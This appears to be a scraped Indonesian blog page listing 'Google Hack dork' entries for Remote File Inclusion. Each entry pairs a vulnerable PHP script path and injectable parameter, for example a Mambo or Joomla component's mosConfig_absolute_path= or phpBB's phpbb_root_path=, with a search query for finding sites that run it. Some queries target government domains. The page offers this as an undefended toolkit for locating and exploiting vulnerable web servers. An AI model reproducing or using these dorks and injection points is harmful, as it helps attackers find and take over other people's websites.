ihm.php?p= inurl:"ihm.php?p=" default.php?page= inurl:"default.php?page=" folder.php?id= inurl:"folder.php?id=" index.php?Load= inurl:"index.php?Load=" index.php?Language= inurl:"index.php?Language=" hall.php?file= inurl:"hall.php?file=" hall.php?page= inurl:"hall.php?page="

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 6

template.php?goto= inurl:"template.php?goto=" video.php?content= inurl:"video.php?content=" pages.php?page= inurl:"pages.php?page=" print.php?page= inurl:"print.php?page=" show.php?page= inurl:"show.php?page=" view.php?page= inurl:"view.php?page=" media.php?page= inurl:"media.php?page=" index1.php?choix= inurl:"index1.php?choix=" index1.php?menu= inurl:"index1.php?menu" index.php?ort= inurl:"index.php?ort=" index2.php?showpage= inurl:"index2.php?showpage=" index2.php?ascii_seite= inurl:"index2.php?ascii_seite=" index2.php?DoAction= inurl:"index2.php?DoAction=" index2.php?ID= inurl:"index2.php?ID=" index2.php?url_page= inurl:"index2.php?url_page=" index1.php?dat= inurl:"index1.php?dat=" index1.php?site= inurl:"index1.php?site=" index0.php?show= inurl:"index0.php?show=" home.php?content= inurl:"home.php?content=" port.php?content= inurl:"port.php?content=" main.php?link= inurl:"main.php?link=" home.php?x= inurl:"home.php?x=" index1.php?x= inurl:"index1.php?x=" index2.php?x= inurl:"index2.php?x=" main.php?x= inurl:"main.php?x=" homepage.php?sel= inurl:"homepage.php?sel=" /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:/xoopsgallery/ /modules/agendax/addevent.inc.php?agendax_path= allinurl:/agendax/ /include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/

[+/-] Selengkapnya...

Google Hack dork Remote File Inclusion 5

/contrib/yabbse/poc.php?poc_root_path= ntitle:PHPOpenChat ext:php /phpopenchat/contrib/yabbse/poc.php?sourcedir= ntitle:PHPOpenChat ext:php /photoalb/lib/static/header.php?set_menu= allintitle:iPhotoAlbum /squito/photolist.inc.php?photoroot= "Squitosoft All Rights Reserved" /bz/squito/photolist.inc.php?photoroot= "Squitosoft All Rights Reserved" /ppa/inc/functions.inc.php?config[ppa_root_path]= allinurl:**/screens/displayimage.php?pid=* /spid/lang/lang.php?lang_path= allinurl:**/spid.php allinurl:**/spid.php?cat=*lang= /classes.php?LOCAL_PATH= "powered by siteframe" al_initialize.php?alpath= "Powered by AutoLinks Pro" /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]= allinurl:*br*/newbb_plus/* /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= "Powered by Mambo" inurl:*gov* /extensions/moblog/moblog_lib.php?basedir= "powered by pivot" /app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH= "phpCodeGenie v. 3.0.2" components/com_performs/performs.php?mosConfig_absolute_path= inurl:"com_performs" modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= inurl:"AllMyGuests" /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path= allinurl:"com_rsgallery" /components/com_smf/smf.php?mosConfig_absolute_path= allinurl:"com_smf" /components/com_cpg/cpg.php?mosConfig_absolute_path= index.php?option=com_cpg administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= inurl:"com_peoplebook" /admin_modules/admin_module_deldir.inc.php?config[path_src_include]= "Powered by yappa-ng 2.3.1" inc/cmses/aedating4CMS.php?dir[inc]= inurl:flashchat site:br bp_ncom.php?bnrep= "Script réalisé par BinGo PHP" /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path= inurl:"/com_mtree/" /jscript.php?my_ms[root]= intitle:"myspeach" inurl:"chat_exemple.php" /popup_window.php?site_isp_root= inurl:"Squirrelcart" /yabbse/Sources/Packages.php?sourcedir= inurl:Yabbse /include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/ site:fr /include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/ site:us /includes/functions_portal.php?phpbb_root_path= "powered by Integramod"

[+/-] Selengkapnya...

Subscribe to: Posts (Atom)